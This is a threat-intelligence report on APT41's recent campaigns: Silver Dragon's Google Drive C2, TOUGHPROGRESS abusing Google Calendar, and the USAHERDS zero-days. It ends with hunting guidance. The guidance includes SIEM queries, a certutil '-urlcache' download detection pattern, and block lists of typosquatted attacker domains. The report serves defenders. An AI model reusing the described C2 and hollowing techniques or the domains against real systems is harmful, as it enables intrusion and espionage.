APT41's Expanding Arsenal: Google Calendar C2, Silver Dragon, and the Persistent Threat to U.S. Defense and Healthcare

RedSheep Reports | March 16, 2026

APT41 is not slowing down. The Chinese-nexus threat group has spawned a newly identified sub-cluster called Silver Dragon that is actively targeting government entities in Europe and Southeast Asia using Google Drive-based command-and-control [1]. Additionally, Google's threat intelligence team documented APT41 campaigns from late 2024 that deployed TOUGHPROGRESS malware abusing Google Calendar for C2 communications [2]. These developments sit alongside an already extensive history of targeting U.S. healthcare and defense organizations, including the exploitation of USAHERDS zero-day vulnerabilities that compromised at least six U.S. state governments [3][4]. For defenders in defense and healthcare organizations, APT41's operational tempo and technical creativity demand urgent attention.

The group's dual mandate of state-sponsored espionage and financially motivated cybercrime makes it uniquely dangerous. A single intrusion can serve intelligence collection and criminal profit simultaneously. The U.S. Department of Justice unsealed indictments against five Chinese nationals associated with APT41 in September 2020, alleging intrusions against over 100 organizations globally [3]. That legal action did little to slow them down.

APT41: Background and Tracking

APT41 (also tracked as Winnti, Wicked Panda, Barium, and Double Dragon) has been active since at least 2012, targeting healthcare, telecoms, high-tech, education, travel services, and media sectors [1]. The group has conducted targeted campaigns against healthcare organizations in 2014, 2015, 2016, 2018, 2019, and 2020, prompting the HHS Health Sector Cybersecurity Coordination Center (HC3) to issue a specific warning about the threat to healthcare [3].

The group's toolkit is extensive. Known malware families include ShadowPad, Cobalt Strike, PlugX, Gh0st RAT, China Chopper, and Mimikatz [3]. More recently, APT41 has added DodgeBox (a loader with multiple evasion techniques) and MoonWalk (a backdoor using Google Drive for C2) to its arsenal [13]. The group has also deployed UEFI bootkits like MoonBounce for firmware-level persistence [14] and mobile spyware families WyrmSpy and DragonEgg [12].

BlackBerry researchers documented APT41's use of bespoke Cobalt Strike malleable C2 profiles, with infrastructure designed to impersonate legitimate services through typosquatted domains masquerading as Microsoft properties [9].

Silver Dragon: A New Sub-Cluster Emerges

The Silver Dragon cluster is assessed with high confidence to operate within the APT41 umbrella and has been targeting entities in Europe and Southeast Asia since at least mid-2024 [1]. The sub-cluster gains initial access by exploiting public-facing internet servers and delivering phishing emails with malicious attachments [1].

Silver Dragon deploys several custom tools. GearDoor is a .NET backdoor that communicates via Google Drive [1]. SilverScreen is a .NET screen-monitoring tool that captures screenshots from compromised hosts [1]. SSHcmd provides remote command execution through SSH [1]. The cluster also uses BamboLoader, a loader with decryption mechanisms linked to China-nexus APT activity [1].

For persistence and post-exploitation, Silver Dragon relies on Cobalt Strike loaded via DLL sideloading, combined with DNS tunneling for additional C2 redundancy [1]. The diversity of tools and techniques reflects "a well-resourced and adaptable threat group" [1].

TOUGHPROGRESS: Abusing Google Calendar for C2

Google's Threat Intelligence Group discovered APT41 activity in late October 2024 using TOUGHPROGRESS malware hosted on a compromised government website [5]. The attack chain begins with spear-phishing emails containing a ZIP archive (in one case named 出境海關申報清單.zip - Chinese for "Export Customs Declaration List") hosted on an exploited government site [2][5].

The ZIP archive contains a directory with fake arthropod images (1.jpg through 5.jpg) alongside two malicious payloads disguised as 6.jpg and 7.jpg [5]. A malicious LNK file (申報物品清單.pdf.lnk - "Declaration of Items List.pdf.lnk") triggers execution [2]. The attack proceeds through multiple stages:

1. PLUSDROP: A DLL that decrypts and executes the next stage in memory [2]
2. PLUSINJECT: Performs process hollowing on a legitimate svchost.exe process [2]
3. TOUGHPROGRESS: The final payload, which uses the Google Calendar API for C2 [2]

TOUGHPROGRESS begins by using a hardcoded 16-byte XOR key to decrypt embedded shellcode stored in the sample's .pdata region [2]. The malware then communicates with a specific Google Calendar API endpoint to receive commands and exfiltrate data [2]. Google developed custom fingerprints to identify and take down attacker-controlled Calendars [2].

This abuse of cloud services for C2 is a deliberate evasion strategy. As Google noted, the technique allows threat actors to "blend in with legitimate activity" [5]. APT41 has used similar approaches with Google Drive (via GearDoor and MoonWalk) [1][13] and Cloudflare Workers [14], making cloud service monitoring a critical defensive requirement.

Healthcare and Defense: Why the Targeting Persists

The healthcare sector remains a priority target for APT41. Medical research data, genomic information, and protected health information all carry intelligence value. APT41 exploited vulnerabilities in networking equipment, cloud software, and IT management tools specifically because of the "over-reliance on the tech for telehealth and telework during the COVID-19 response" [4].

The USAHERDS campaign demonstrated APT41's willingness to exploit niche, sector-specific software. Between May 2021 and February 2022, the group used two zero-day attacks on the USAHERDS livestock management application, exploiting a hard-coded credentials vulnerability (CVE-2021-44207), and compromised at least six U.S. state governments [3][4]. The group simultaneously exploited CVE-2021-44228 (Log4j) during the same campaign [3]. Thirteen organizations were confirmed victims of APT41 in 2021 alone [4].

Healthcare organizations manage sensitive patient data at scale, making them a persistent and lucrative target for state-sponsored cyber espionage. Compromise of healthcare systems could yield sensitive patient records, diagnostic histories, and detailed information about the medical histories of targeted individuals. That intelligence has direct value for profiling and targeting individuals for recruitment, coercion, or extortion.

Zero-Day Exploitation and Speed

APT41 consistently demonstrates the ability to weaponize vulnerabilities faster than most organizations can patch. In March 2020, Darktrace detected APT41 exploiting CVE-2020-10189, a Zoho ManageEngine zero-day, before signatures were available [6]. The attackers downloaded a Go binary named promocioni.php and moved to establish persistence before IT staff could begin patching [6].

Cisco Talos documented APT41 compromising a Taiwanese government-affiliated research institute using ShadowPad and Cobalt Strike, with DLL side-loading through a Bitdefender executable and exploitation of CVE-2018-0824 for privilege escalation [10][11]. The Cobalt Strike loader was written in GoLang with anti-AV capabilities, and contained file path strings in Simplified Chinese [11].

Kaspersky's MDR team detected an APT41 targeted attack against African government IT services, marking a geographic expansion for the group [7]. The attackers used hardcoded names of internal services, IP addresses, and proxy servers in their malware, and established a C2 on a captive SharePoint server within the victim's own infrastructure [7].

IOC Table

MITRE ATT&CK Mapping

Detection and Hunting

Cloud Service C2 Detection: APT41's shift toward abusing Google Calendar, Google Drive, and Cloudflare for C2 means defenders need to monitor API calls to googleapis.com/calendar and googleapis.com/drive endpoints from unexpected processes. Look for svchost.exe or other system processes initiating outbound HTTPS connections to these services. SIEM query example: process_name IN ("svchost.exe", "rundll32.exe") AND dns_query CONTAINS "googleapis.com".

DLL Side-Loading Indicators: Hunt for unknown executables loading DLLs from non-standard directories. Monitor for legitimate signed binaries (particularly Bitdefender executables) loading unexpected DLLs [1][11].

DNS Tunneling: Silver Dragon uses DNS tunneling for C2 redundancy [1]. Monitor for high-volume DNS queries (>1000 queries per minute) to unusual domains, particularly those with encoded or high-entropy subdomain strings. Flag domains matching patterns like s3-azure.com or ns*.s3-azure.com [7].

Process Hollowing: PLUSINJECT creates hollowed svchost.exe processes [2]. Hunt for svchost.exe instances spawned by non-standard parent processes or running from unusual file paths.

Typosquatted Domains: APT41 consistently registers domains that mimic legitimate services. Block and alert on connections to domains like mlcrosoft.site, win10micros0ft.com, and affice366.com [9][12]. Implement fuzzy-match domain monitoring for your organization's key vendor names.

Web Shell Activity: Watch for certutil.exe being called to download binaries, a technique documented in APT41's DUSTTRAP campaigns [8]. Query: process_name="certutil.exe" AND command_line CONTAINS "-urlcache".

Analysis

APT41's operational patterns over the past two years reveal three significant shifts. First, the group is systematically migrating C2 infrastructure to legitimate cloud services. Google Calendar, Google Drive, Cloudflare Workers, and SharePoint have all been weaponized for C2 communications [2][1][7][14]. This complicates network-based detection because blocking these services entirely is impractical for most organizations.

Second, the emergence of Silver Dragon as a distinct sub-cluster suggests APT41 is compartmentalizing operations, likely to maintain operational security and reduce the blast radius of any single exposure [1]. This mirrors organizational patterns seen in other Chinese APT ecosystems.

Third, the group continues to target niche, sector-specific software (like USAHERDS) alongside broadly deployed platforms (like Log4j and Zoho ManageEngine) [3][4][6]. This dual approach means both generic vulnerability management programs and sector-specific application security reviews are necessary.

For healthcare and defense organizations, the convergence of APT41's espionage mandate with its technical capabilities presents a serious and ongoing threat. The group has demonstrated it will target the specific software stacks used in government health programs. DHA and TRICARE systems, with their combination of health data and military personnel information, represent a high-value target set.

References

1. APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2
2. Mark Your Calendar: APT41 Innovative Tactics
3. Healthcare Industry Warned About Risk Posed by APT41 Threat Group
4. APT41 spear-phishing, supply chain campaigns target pharma, healthcare
5. Chinese APT41 Exploits Google Calendar for Malware Command-and-Control Operations
6. How AI Caught APT41 Exploiting Vulnerabilities
7. SOC files: an APT41 attack on government IT services in Africa
8. APT41 Has Arisen From the DUST
9. Drawing a Dragon: Connecting the Dots to Find APT41
10. Cisco Talos APT41 IOCs
11. APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike
12. Finding WyrmSpy and DragonEgg Ties to APT41 in the DNS
13. DodgeBox: Deep Dive Into Updated Arsenal of APT41
14. APT41 Cyberespionage and Cybercrime Group: 2025 Global Analysis